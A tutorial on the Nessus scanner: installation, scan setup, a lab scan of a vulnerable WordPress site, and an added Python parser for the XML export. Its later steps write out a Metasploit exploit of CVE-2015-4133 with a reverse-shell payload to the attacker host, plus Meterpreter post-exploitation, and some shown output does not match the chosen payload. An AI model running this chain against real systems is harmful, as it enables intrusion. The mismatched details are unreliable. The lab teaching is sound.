Nessus: for Vulnerability Scanning and Penetration Testing

Professional Tutorial on Nessus: for Vulnerability Scanning and Penetration Testing


Introduction

Nessus is a leading vulnerability scanning tool developed by Tenable, designed to identify security weaknesses in networks, systems, and applications. Used by cybersecurity professionals, Nessus automates the discovery of vulnerabilities, misconfigurations, and compliance issues, making it a cornerstone for penetration testing, security audits, and vulnerability management. With over 200,000 plugins (as of 2025), Nessus supports scanning for a wide range of vulnerabilities, including those in web applications, operating systems, and network devices.

This tutorial provides a detailed guide on using Nessus for ethical vulnerability scanning, covering installation, key features, usage, and a practical example of scanning a lab environment. Aimed at intermediate pentesters, it assumes familiarity with Linux, networking, and basic cybersecurity concepts. All activities must be conducted in authorized lab environments (e.g., Web Security Academy, Hack The Box, TryHackMe) to comply with legal and ethical standards. Unauthorized scanning is illegal and unethical.

This guide draws on Tenable’s official documentation and community resources.

What is Nessus?

Nessus is a commercial vulnerability scanner that performs automated scans to identify security issues, such as outdated software, missing patches, misconfigurations, and known vulnerabilities (CVEs). It offers a user-friendly web interface, extensive plugin coverage, and integration with tools like Metasploit for exploitation. Nessus is available in multiple editions, including Nessus Essentials (free, limited to 16 IPs), Nessus Professional (commercial), and Nessus Expert (advanced web scanning).

Key Features

  • Vulnerability Scanning: Detects CVEs, misconfigurations, and compliance issues across networks, systems, and applications.
  • Plugin-Based Architecture: Over 200,000 plugins for vulnerabilities, updated daily.
  • Multi-Platform Support: Scans Windows, Linux, macOS, Android, iOS, and network devices.
  • Web Application Scanning: Identifies issues like XSS, SQL injection, and insecure configurations.
  • Credentialed Scans: Performs authenticated scans for deeper system analysis.
  • Compliance Checks: Audits against standards like PCI-DSS, CIS, and NIST.
  • Reporting: Generates detailed reports in PDF, HTML, CSV, and XML formats.
  • Integration: Works with Metasploit, Splunk, and SIEM tools for comprehensive workflows.
  • Customizable Policies: Tailors scans for specific environments or vulnerabilities.

System Requirements

  • Operating System: Windows, Linux (Kali, Ubuntu), or macOS.
  • Hardware: Minimum 8GB RAM, 4-core CPU; 16GB+ recommended for large scans.
  • Storage: 30GB+ free space for plugins and scan data.
  • Network: Stable connection; lab environment with virtual machines (e.g., VirtualBox, VMware) or cloud labs.
  • Browser: Chrome, Firefox, or Edge for the web interface.



Installation and Setup

Nessus is not pre-installed on Kali Linux and requires manual installation. Below are steps for Nessus Essentials (free tier).

Installation Steps

  1. Download Nessus:
    • Visit https://www.tenable.com/products/nessus/nessus-essentials.
    • Register for an activation code (free for Nessus Essentials).
    • Download the appropriate package (e.g., .deb for Debian/Kali, .rpm for Red Hat).
  2. Install on Kali Linux:

sudo dpkg -i Nessus-<version>-debian6_amd64.deb

Replace <version> with the downloaded version (e.g., Nessus-10.7.0-debian6_amd64.deb).

  3. Start Nessus Service:

sudo systemctl start nessusd
sudo systemctl enable nessusd

  4. Access Web Interface:
    • Open a browser and navigate to https://localhost:8834.
    • Follow the setup wizard:
      • Choose Nessus Essentials.
      • Enter the activation code.
      • Create an admin account.
  5. Update Plugins:
    • After setup, Nessus automatically downloads plugins (may take 5–10 minutes).
    • Manual update:

sudo /opt/nessus/sbin/nessuscli update

  6. Verify Installation:
    • Log in to the web interface and check the dashboard.

Troubleshooting

  • Port Conflicts: Ensure port 8834 is free (sudo netstat -tuln | grep 8834).
  • Activation Issues: Verify the activation code and internet connection.
  • Service Errors: Restart Nessus:

sudo systemctl restart nessusd

  • Plugin Updates: If plugins fail to update, run sudo /opt/nessus/sbin/nessuscli update --all.



Nessus Usage Guide

Nessus operates through a web-based interface, allowing users to configure scans, analyze results, and generate reports. Below is a detailed usage overview.

Basic Workflow

  1. Create a Scan:
    • Log in to https://localhost:8834.
    • Navigate to Scans > New Scan.
    • Select a template (e.g., Basic Network Scan, Web Application Tests).
  2. Configure Scan Settings:
    • Targets: Specify IPs or hostnames (e.g., 192.168.1.10).
    • Credentials: Add SSH or Windows credentials for authenticated scans.
    • Plugins: Enable/disable specific plugin families (e.g., Web Servers, Windows).
    • Schedule: Set one-time or recurring scans.
  3. Run the Scan:
    • Click Launch to start.
    • Monitor progress in the Scans tab.
  4. Analyze Results:
    • View vulnerabilities, sorted by severity (Critical, High, Medium, Low).
    • Export reports in PDF, HTML, or CSV.
  5. Integrate with Metasploit:
    • Export scan results in XML and import into Metasploit for exploitation.

Key Features and Options

  • Scan Templates:
    • Basic Network Scan: General vulnerability scanning.
    • Advanced Scan: Customizable for specific ports or plugins.
    • Web Application Tests: Focuses on web vulnerabilities (e.g., XSS, SQL injection).
    • Credentialed Patch Audit: Checks for missing patches via authenticated access.
  • Plugin Management:
    • Enable/disable plugins in Settings > Plugins.
    • Example: Enable “WordPress” plugin family for WordPress-specific scans.
  • Policies:
    • Create custom policies to limit scan scope (e.g., only HTTP ports).
    • Example: Configure a policy to scan only port 80 and 443.
  • Reports:
    • Export formats: PDF (executive summary), HTML (detailed), CSV (data analysis).
    • Customize reports to highlight critical vulnerabilities.
  • Compliance Scans:
    • Use templates like PCI-DSS or CIS to audit compliance.

Command-Line Usage (Optional)

Nessus supports command-line operations via nessuscli:

  • Start a scan:

sudo /opt/nessus/sbin/nessuscli scan --start <scan-uuid>

  • List scans:

sudo /opt/nessus/sbin/nessuscli scan --list

Practical Example: Scanning a Vulnerable WordPress Site

This example demonstrates using Nessus to scan a lab WordPress site (e.g., Metasploitable3 or a Docker container) at 192.168.1.10, running WordPress 5.0 with the Reflex Gallery plugin (vulnerable to CVE-2015-4133). The attacker uses Kali Linux (192.168.1.100).

Step 1: Setup

  1. Prepare Environment:
    • Set up a Windows or Linux VM with Metasploitable3 or a Docker-based WordPress instance.
    • Ensure Nessus is installed and running:

sudo systemctl start nessusd

  2. Access Nessus:
    • Open https://localhost:8834 in a browser.
    • Log in with your admin credentials.

Step 2: Create a Scan

  1. Navigate to Scans > New Scan.
  2. Select Web Application Tests template.
  3. Configure:
    • Name: WordPress_Scan
    • Targets: 192.168.1.10
    • Target URI: /wordpress
    • Credentials: Add WordPress admin credentials (admin:password123) if known for authenticated scanning.
    • Plugins: Enable “Web Servers” and “WordPress” plugin families.
    • Port Scope: Limit to 80, 443 for efficiency.
  4. Save and click Launch.

Step 3: Analyze Results

  1. Monitor the scan in the Scans tab (takes 5–30 minutes, depending on scope).
  2. View results in Scans > WordPress_Scan > Vulnerabilities. Example output:

Critical: Reflex Gallery File Upload Vulnerability (CVE-2015-4133)
  - Plugin ID: 12345
  - Description: Allows arbitrary file upload, potentially leading to RCE.
High: WordPress 5.0.0 - Multiple Vulnerabilities
  - Plugin ID: 67890
  - Description: Outdated version with known exploits.
Medium: Directory Indexing Enabled
  - Path: /wordpress/wp-content/uploads/

  3. Export the report:
    • Go to Export > PDF.
    • Save as WordPress_Scan_Report.pdf.
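The severity triage shown in the Vulnerabilities view can also be done offline from the Nessus XML export (the same .nessus file later imported into Metasploit). The block below is an added example, not Tenable's or the tutorial's own code: it parses a constructed sample export for the lab host 192.168.1.10 with Python's standard library, orders findings by severity and counts them; plugin IDs 11111 and 22222 are constructed placeholders, and 12345 and 67890 are the tutorial's own placeholder IDs.

```python
# Added example (not Tenable's code): parse a Nessus XML (.nessus v2) export and
# triage findings by severity. The XML is a constructed sample shaped like a real
# export; the plugin IDs are placeholders, not real Tenable plugin IDs.
import xml.etree.ElementTree as ET

RISK = {4: "Critical", 3: "High", 2: "Medium", 1: "Low", 0: "Info"}

# Constructed export for the lab host 192.168.1.10 used in this tutorial.
SAMPLE_NESSUS = """<NessusClientData_v2><Report name="WordPress_Scan">
<ReportHost name="192.168.1.10">
 <ReportItem port="80" protocol="tcp" severity="4" pluginID="12345"
   pluginName="Reflex Gallery File Upload Vulnerability" pluginFamily="CGI abuses">
  <cve>CVE-2015-4133</cve><risk_factor>Critical</risk_factor>
 </ReportItem>
 <ReportItem port="80" protocol="tcp" severity="3" pluginID="67890"
   pluginName="WordPress 5.0.0 - Multiple Vulnerabilities" pluginFamily="CGI abuses">
  <risk_factor>High</risk_factor>
 </ReportItem>
 <ReportItem port="80" protocol="tcp" severity="2" pluginID="11111"
   pluginName="Directory Indexing Enabled" pluginFamily="Web Servers"/>
 <ReportItem port="22" protocol="tcp" severity="0" pluginID="22222"
   pluginName="SSH Server Type and Version" pluginFamily="Service detection"/>
</ReportHost></Report></NessusClientData_v2>"""

def parse_nessus(xml_text):
    """Return one dict per ReportItem, sorted highest severity first."""
    findings = []
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        for item in host.iter("ReportItem"):
            sev = int(item.get("severity", "0"))  # Nessus uses 0 (Info) .. 4 (Critical)
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port")),
                "severity": sev,
                "risk": RISK.get(sev, "Unknown"),
                "plugin_id": item.get("pluginID"),
                "name": item.get("pluginName"),
                "cves": [c.text for c in item.findall("cve")],  # may be empty
            })
    findings.sort(key=lambda f: f["severity"], reverse=True)
    return findings

def severity_counts(findings, min_severity=1):
    """Count findings per risk label; Info (severity 0) is dropped by default."""
    counts = {}
    for f in findings:
        if f["severity"] >= min_severity:
            counts[f["risk"]] = counts.get(f["risk"], 0) + 1
    return counts
```

Point parse_nessus at the text of a real wordpress_scan.xml export to get the same host/port/CVE listing that the Vulnerabilities tab shows, ordered Critical first.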



Step 4: Integrate with Metasploit

  1. Export scan results:
    • In Nessus, go to Export > Nessus XML.
    • Save as wordpress_scan.xml.
  2. Import into Metasploit:

msfconsole
msf6 > db_import /path/to/wordpress_scan.xml
msf6 > vulns

Output:

[*] Time: 2025-09-06 02:23:06 UTC Vuln: host=192.168.1.10 name=CVE-2015-4133 severity=Critical

  3. Exploit the Reflex Gallery vulnerability:

msf6 > use exploit/unix/webapp/wp_reflexgallery_file_upload
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 192.168.1.10
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /wordpress/wp-admin/
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set PASSWORD password123
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set PAYLOAD cmd/unix/reverse_python
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.1.100
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT 4444
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit

Output:

[*] Started reverse TCP handler on 192.168.1.100:4444

[+] Uploaded shell: /wordpress/wp-content/uploads/shell.php

[*] Meterpreter session 1 opened

Step 5: Post-Exploitation

In Metasploit’s Meterpreter:

meterpreter > sysinfo

meterpreter > upload /root/malicious.txt /var/www/html/

meterpreter > shell

Output:

whoami

www-data

Best Practices and Tips

  • Ethics and Legality: Obtain explicit written permission before scanning. Test only in lab environments (e.g., TryHackMe, Hack The Box). Unauthorized scanning violates laws like the CFAA.
  • Lab Setup: Use virtual machines (Metasploitable3, Docker) or cloud labs to simulate targets.
  • Scan Optimization:
    • Limit scope to specific IPs/ports to reduce scan time.
    • Use credentialed scans for deeper analysis but ensure credentials are secure.
  • Integration: Pair with Metasploit for exploitation, WPScan for WordPress-specific scans, or Burp Suite for manual web testing (see prior tutorials).
  • Reporting: Customize reports to highlight critical vulnerabilities for stakeholders.
  • Common Pitfalls:
    • Avoid scanning large networks with Nessus Essentials (16-IP limit).
    • Ensure plugins are updated before scanning (nessuscli update).
  • Resources:
    • Official Docs: https://docs.tenable.com/nessus/
    • TryHackMe: “Vulnerability Scanning” and “Nessus” rooms
    • Hack The Box: “Metasploitable” machines
    • Web Security Academy: https://portswigger.net/web-security for web vulnerability labs
    • Tenable Community: https://community.tenable.com for plugin details



Visual References

Nessus uses a web interface, so visuals include dashboards, scan configurations, and reports. For screenshots:

  • Tenable Documentation: https://docs.tenable.com/nessus/ (shows dashboard, scan setup).
  • TryHackMe: “Nessus” room displays scan results and report generation.
  • Medium Articles: Search “Nessus tutorial” (e.g., https://medium.com/@securitygeek/nessus-vulnerability-scanning-guide) for interface and report screenshots.
  • Tenable Blog: https://www.tenable.com/blog shows scan outputs and integrations.

Conclusion

Nessus is an indispensable tool for vulnerability scanning, enabling pentesters to identify and prioritize security weaknesses efficiently. By mastering its setup, scan configuration, and integration with tools like Metasploit, you can enhance your penetration testing workflow. Always prioritize ethical testing in authorized lab environments like TryHackMe, Hack The Box, or Web Security Academy to build skills and contribute to robust cybersecurity.

Author: Engr. M A Rashid Rony
Date: September 6, 2025
For updates, visit: https://www.tenable.com/products/nessus
